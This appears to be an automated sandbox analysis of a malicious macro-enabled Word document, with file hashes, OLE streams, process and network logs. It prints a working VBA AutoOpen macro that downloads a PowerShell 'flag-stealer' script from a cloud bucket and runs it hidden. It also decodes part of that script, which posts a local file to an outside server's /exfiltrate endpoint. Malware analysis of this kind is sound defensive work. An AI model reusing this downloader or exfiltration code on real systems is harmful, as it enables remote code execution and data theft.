SHA-256:	E745547DC61C33870DB1220054FEB196C656A7BCC091FA9E5E4FFB7A56822F38
SHA-512:	7AFFA6248692EDCC64CDA2673BB5818AA49B8D143E7906D6ADB514125AC310D75EEA185E33A66E2391077EBD12AC1980795BE84AA3FDC26284CE56F27962AA96
Malicious:	false
Preview:	.user..................................................j.o.n.e.s...els/vbaProject.bin.rels....................l.Ak.0....`...(...........5'.."..}.lj.........=*j

C:\Users\user\Desktop\~WRD0000.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	29788
Entropy (8bit):	7.7268729392842435
Encrypted:	false
SSDEEP:	768:yZX/CWwQ17q5Bvn15V33Fau4i7I91FRct5r:yxZ17qLjV33AugBaLr
MD5:	D5CB326E50C2AFE07CBCFC0ED4108B13
SHA1:	CB508BF58CCFD613CE80A3691DC3AD5F0D07CBF5
SHA-256:	4A9FD98FA9A701C6B9A64BE9D8DBC6ACE8DBB910E91799C78EA1258C251F1929
SHA-512:	A848672603C5D749071488F6E62D46639B44B50E041219A55AE071DD3FDD24112043486498C067076C4143E45110BBA71AB62C1D8A29A527D67F08849DB4B984
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	PK..........!.\|..\|............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-.]X ......J..p.Ik......=.&-...(.D.=..;.3.....9.d.+.).....i.......J.e...l..].....e.........I....}.G;..V"...R=.)..^.\(....X3.?.R.T..,h.I21.e.M]mU0.Be.D..s..M./K...'r...(d.[X.u.>G......43!.P...zg.A...s.FC6........KJ...v]K8......*..''.....q.[]..../L[E'9....So...4jV.^AJt.m..n.= ....Zrg.W.<.,..xg..\|.......tg......t..+..K..q........~.......[.q$...A=U4.o..j..........PK..........!.........N......._rels

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.575955063293286
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96% Word Microsoft Office Open XML Format document (49504/1) 36.13% Word Microsoft Office Open XML Format document (27504/1) 20.07% ZIP compressed archive (8000/1) 5.84%
File name:	mal_temp.dotm.doc
File size:	21'731 bytes
MD5:	65a18dada289696e52a38b04ca7f8c8d
SHA1:	bd4a547e5b32f063581003b5d6d83113fe302f3b
SHA256:	79e73d7d1c51b238c9d123afea7707cb1aa339cbb6d42fd7b4dd84813419c0cb
SHA512:	8f93155bf380aa352feb365852266fb618c4d18820383b2260ed2e3c3a06f7b9d26b4bdae11c96fd6232e9102dba5383d45515210384ba1a67f93333527437e2
SSDEEP:	384:tlH87tnJQ6JxOrAt/fZvd3YMWkPCXcPg7VfRJ6x6MQV:/HMnJtcrsfZF3YMGcPg9j6y
TLSH:	03A2BF2FD10AB82BE22F847E015215C5F2808067977698BD961878ED83496B71F07BDB
File Content Preview:	PK..........!.\|..\|............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "mal_temp.dotm.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Title:
Subject:
Author:	Andrii Kulyzhskyi
Keywords:
Template:	mal_temp.dotm
Last Saved By:	Andrii Kulyzhskyi
Revion Number:	17
Total Edit Time:	1
Create Time:	2025-02-17T12:11:00Z
Last Saved Time:	2025-02-17T19:52:00Z
Number of Pages:	1
Number of Words:	0
Number of Characters:	0
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	0
Number of Paragraphs:	0
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 4787

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	4787
Data ASCII:	. . . . . . . . . . . . . . . 8 . . . . . . . . . . . 3 . . . . . . . . . . . N R . . # . . . . . . . . . . . . . . . . . p . . . L T / @ . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . ; ; . _ E . * . . . . . . . . . . . . . . . . . . . . . . . x . . . . ; ; . _ E . * . L T / @ . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . 8 . P . . . . . [ L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0
Data Raw:	01 16 03 00 04 00 01 00 00 9a 06 00 00 e4 00 00 00 38 02 00 00 01 07 00 00 0f 07 00 00 33 0e 00 00 00 00 00 00 01 00 00 00 4e 52 a2 c8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 4c d1 c1 b5 be 54 2f 40 be 0b 0b 9e 85 e8 0c ad 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoOpen()
    Dim strUrl As String
    Dim strFilePath As String
    Dim objXMLHttp As Object
    Dim objStream As Object
    Dim objShell As Object
    Dim objFile As Object
    
    ' Define URL and file path
    strUrl = "https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1"
    strFilePath = Environ("TEMP") & "\downloaded_script.ps1"

    ' Create XMLHTTP and download the file
    Set objXMLHttp = CreateObject("MSXML2.XMLHTTP")
    objXMLHttp.Open "GET", strUrl, False
    objXMLHttp.Send
    
    MsgBox "Status: " & objXMLHttp.Status

    If objXMLHttp.Status = 200 Then
        ' Use ADODB.Stream to write the file (more reliable)
        Set objFileSystem = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFileSystem.CreateTextFile(strFilePath, True)
        objFile.Write objXMLHttp.responseText
        objFile.Close

        ' Run the PowerShell script silently
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & strFilePath & """", 0, False
        
        ' Wait for script to finish (adjust delay if needed)
        Dim pauseTime As Date
        pauseTime = Now + TimeValue("00:00:05")
        Do While Now < pauseTime
            DoEvents
        Loop
        
        ' Delete the file (skip if in use)
        On Error Resume Next
        Kill strFilePath
        On Error GoTo 0
    Else
        MsgBox "Download failed. HTTP Status: " & objXMLHttp.Status
    End If
    
    ' Cleanup
    Set objXMLHttp = Nothing
    Set objStream = Nothing
    Set objShell = Nothing
End Sub

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 383

General
Stream Path:	PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	383
Entropy:	5.351254963514453
Base64 Encoded:	True
Data ASCII:	I D = " { B 0 C B 9 F 2 B - 7 6 5 C - 4 7 5 3 - 9 A 1 6 - 5 7 9 3 1 F 4 4 9 A E 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " T e m p l a t e P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A B A 9 7 3 D 3 C 1 D 7 C 1 D 7 C 1 D 7 C 1 D 7 " . . D P B = " F D F F 2 5 8 5 2 5 D 6 2 6 D 6 2 6 D 6 " . . G C = " 4 F 4 D 9 7 7 7 B B 9 B 0 C 9 C 0 C 9 C F 3 " . . . . [ H o s t E x t e
Data Raw:	49 44 3d 22 7b 42 30 43 42 39 46 32 42 2d 37 36 35 43 2d 34 37 35 33 2d 39 41 31 36 2d 35 37 39 33 31 46 34 34 39 41 45 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 54 65 6d 70 6c 61 74 65 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f

Stream Path: PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	PROJECTwm
CLSID:
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2752

General
Stream Path:	VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2752
Entropy:	4.4140468698105035
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
Data Raw:	cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 4054

General
Stream Path:	VBA/__SRP_0
CLSID:
File Type:	data
Stream Size:	4054
Entropy:	3.53106703671494
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ " . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . .
Data Raw:	93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 174

General
Stream Path:	VBA/__SRP_1
CLSID:
File Type:	data
Stream Size:	174
Entropy:	1.6147753056555683
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 2010

General
Stream Path:	VBA/__SRP_2
CLSID:
File Type:	data
Stream Size:	2010
Entropy:	3.5441025990478714
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . Q . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 25 00 00 00 c1 09 00 00 00 00 00 00 00 00 00 00 91 0c 00 00 00 00 00 00 00 00 00 00 e1 11 00 00 00 00 00 00 00 00

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156

General
Stream Path:	VBA/__SRP_3
CLSID:
File Type:	data
Stream Size:	156
Entropy:	1.7792651372894157
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . ! . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 00 00 21 0e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 479

General
Stream Path:	VBA/dir
CLSID:
File Type:	data
Stream Size:	479
Entropy:	6.256046408728161
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . T e m p l a t e . P r o j e c t . Q . H . . @ . . . . . = . . . . \| . . . . . . . . Q i . . . . J . < . . . . . 9 s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . 0 . . E O f f i c E O . f . i . c E . . . E 2 D F . 8 D 0 4 C - 5 B . F A - 1 0 1 B - B D E 5 E A
Data Raw:	01 db b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0f 00 1c 00 54 65 6d 70 6c 61 74 65 00 50 72 6f 6a 65 63 74 05 51 00 48 00 00 40 02 0a 06 02 0a 3d ad 02 0a 07 02 7c 01 14 08 06 12 09 02 12 80 51 e7 c6 69 0d 00 0c 02 4a 12 3c 02 0a 16 00 01 39 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 26
• 11858 undefined
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 9, 2025 02:19:25.660533905 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:25.660625935 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:25.660705090 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:25.661540985 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:25.661575079 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:27.468056917 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:27.468123913 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:27.485317945 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:27.485354900 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:27.485583067 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:27.485641956 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:27.486423016 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:27.528366089 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:28.224991083 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:28.225059032 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:28.228607893 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:28.228681087 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:28.228710890 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:28.228754044 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:28.228816986 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:28.231410980 CET	49717	443	192.168.2.4	52.219.171.190
Mar 9, 2025 02:19:28.231436014 CET	443	49717	52.219.171.190	192.168.2.4
Mar 9, 2025 02:19:33.220879078 CET	49727	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:19:33.226116896 CET	11858	49727	18.157.68.73	192.168.2.4
Mar 9, 2025 02:19:33.226190090 CET	49727	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:19:33.226408958 CET	49727	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:19:33.231690884 CET	11858	49727	18.157.68.73	192.168.2.4
Mar 9, 2025 02:19:33.572962999 CET	49727	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:19:33.578108072 CET	11858	49727	18.157.68.73	192.168.2.4
Mar 9, 2025 02:19:39.107554913 CET	49494	53	192.168.2.4	1.1.1.1
Mar 9, 2025 02:19:39.112716913 CET	53	49494	1.1.1.1	192.168.2.4
Mar 9, 2025 02:19:39.112840891 CET	49494	53	192.168.2.4	1.1.1.1
Mar 9, 2025 02:19:39.118005991 CET	53	49494	1.1.1.1	192.168.2.4
Mar 9, 2025 02:19:39.590770960 CET	49494	53	192.168.2.4	1.1.1.1
Mar 9, 2025 02:19:39.596069098 CET	53	49494	1.1.1.1	192.168.2.4
Mar 9, 2025 02:19:39.596349955 CET	49494	53	192.168.2.4	1.1.1.1
Mar 9, 2025 02:20:35.297816038 CET	11858	49727	18.157.68.73	192.168.2.4
Mar 9, 2025 02:20:35.298017979 CET	49727	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:20:35.307188988 CET	49727	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:20:35.312385082 CET	11858	49727	18.157.68.73	192.168.2.4
Mar 9, 2025 02:21:35.353458881 CET	49498	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:21:35.358887911 CET	11858	49498	18.157.68.73	192.168.2.4
Mar 9, 2025 02:21:35.358994007 CET	49498	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:21:35.361829996 CET	49498	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:21:35.366935968 CET	11858	49498	18.157.68.73	192.168.2.4
Mar 9, 2025 02:21:35.706290007 CET	49498	11858	192.168.2.4	18.157.68.73
Mar 9, 2025 02:21:35.711688995 CET	11858	49498	18.157.68.73	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 9, 2025 02:19:25.645899057 CET	58880	53	192.168.2.4	1.1.1.1
Mar 9, 2025 02:19:25.657330036 CET	53	58880	1.1.1.1	192.168.2.4
Mar 9, 2025 02:19:39.107181072 CET	53	54415	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 9, 2025 02:19:25.645899057 CET	192.168.2.4	1.1.1.1	0xe282	Standard query (0)	free-games-ua.s3.eu-central-1.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 9, 2025 02:19:25.277502060 CET	1.1.1.1	192.168.2.4	0x169c	No error (0)	ecs-office.s-0005.dual-s-msedge.net	s-0005.dual-s-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 9, 2025 02:19:25.277502060 CET	1.1.1.1	192.168.2.4	0x169c	No error (0)	s-0005.dual-s-msedge.net		52.123.129.14	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.277502060 CET	1.1.1.1	192.168.2.4	0x169c	No error (0)	s-0005.dual-s-msedge.net		52.123.128.14	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	free-games-ua.s3.eu-central-1.amazonaws.com	s3-r-w.eu-central-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	s3-r-w.eu-central-1.amazonaws.com		52.219.171.190	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	s3-r-w.eu-central-1.amazonaws.com		3.5.136.54	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	s3-r-w.eu-central-1.amazonaws.com		3.5.136.63	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	s3-r-w.eu-central-1.amazonaws.com		3.5.135.40	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	s3-r-w.eu-central-1.amazonaws.com		3.5.137.106	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	s3-r-w.eu-central-1.amazonaws.com		3.5.138.179	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	s3-r-w.eu-central-1.amazonaws.com		3.5.136.77	A (IP address)	IN (0x0001)	false
Mar 9, 2025 02:19:25.657330036 CET	1.1.1.1	192.168.2.4	0xe282	No error (0)	s3-r-w.eu-central-1.amazonaws.com		3.5.135.121	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

free-games-ua.s3.eu-central-1.amazonaws.com

18.157.68.73:11858

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49727	18.157.68.73	11858	8160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2025 02:19:33.226408958 CET	172	OUT	POST /exfiltrate HTTP/1.1 Content-Type: text/plain User-Agent: Mozilla/5.0 Host: 18.157.68.73:11858 Content-Length: 12 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49498	18.157.68.73	11858	8160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2025 02:21:35.361829996 CET	172	OUT	POST /exfiltrate HTTP/1.1 Content-Type: text/plain User-Agent: Mozilla/5.0 Host: 18.157.68.73:11858 Content-Length: 12 Expect: 100-continue Connection: Keep-Alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49717	52.219.171.190	443	7564	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2025-03-09 01:19:27 UTC	343	OUT	GET /flag-stealer.ps1 HTTP/1.1 Accept: / Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: free-games-ua.s3.eu-central-1.amazonaws.com Connection: Keep-Alive
2025-03-09 01:19:28 UTC	424	IN	HTTP/1.1 200 OK x-amz-id-2: eH5Lc0tYmjPFm/MDdIexB2SaGPz7rkySFuUFwzNGsHak1E3T0iuwJg6FTvJBSPSN8YYUxP287yc= x-amz-request-id: RB7QX8TDZ7JY3KC6 Date: Sun, 09 Mar 2025 01:19:28 GMT Last-Modified: Mon, 17 Feb 2025 19:51:22 GMT ETag: "80afb207fbd093a17256554f036d4cb3" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: binary/octet-stream Content-Length: 1728 Server: AmazonS3 Connection: close
2025-03-09 01:19:28 UTC	1728	IN	Data Raw: 0d 0a 24 66 69 6c 65 50 61 74 68 20 3d 20 22 24 65 6e 76 3a 54 45 4d 50 5c 66 6c 61 67 2e 74 78 74 22 0d 0a 24 73 65 72 76 65 72 55 72 6c 20 3d 20 22 68 74 74 70 3a 2f 2f 31 38 2e 31 35 37 2e 36 38 2e 37 33 3a 31 31 38 35 38 2f 65 78 66 69 6c 74 72 61 74 65 22 0d 0a 0d 0a 23 20 44 65 66 69 6e 65 20 74 68 65 20 73 63 72 69 70 74 20 6c 6f 67 69 63 20 61 73 20 61 20 73 74 72 69 6e 67 0d 0a 24 73 63 72 69 70 74 43 6f 6e 74 65 6e 74 20 3d 20 40 27 0d 0a 70 61 72 61 6d 28 24 66 69 6c 65 50 61 74 68 2c 20 24 73 65 72 76 65 72 55 72 6c 29 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 55 70 6c 6f 61 64 46 69 6c 65 20 7b 0d 0a 20 20 20 20 70 61 72 61 6d 28 24 70 61 74 68 2c 20 24 75 72 6c 29 0d 0a 20 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 77 65 62 43 6c Data Ascii: $filePath = "$env:TEMP\flag.txt"$serverUrl = "http://18.157.68.73:11858/exfiltrate"# Define the script logic as a string$scriptContent = @'param($filePath, $serverUrl)function UploadFile { param($path, $url) try { $webCl

Statistics

Click to jump to process

Memory Usage

• WINWORD.EXE
• powershell.exe
• conhost.exe
• powershell.exe
• conhost.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• WINWORD.EXE
• powershell.exe
• conhost.exe
• powershell.exe
• conhost.exe

Click to jump to process

Target ID:	0
Start time:	20:19:18
Start date:	08/03/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x560000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:19:29
Start date:	08/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
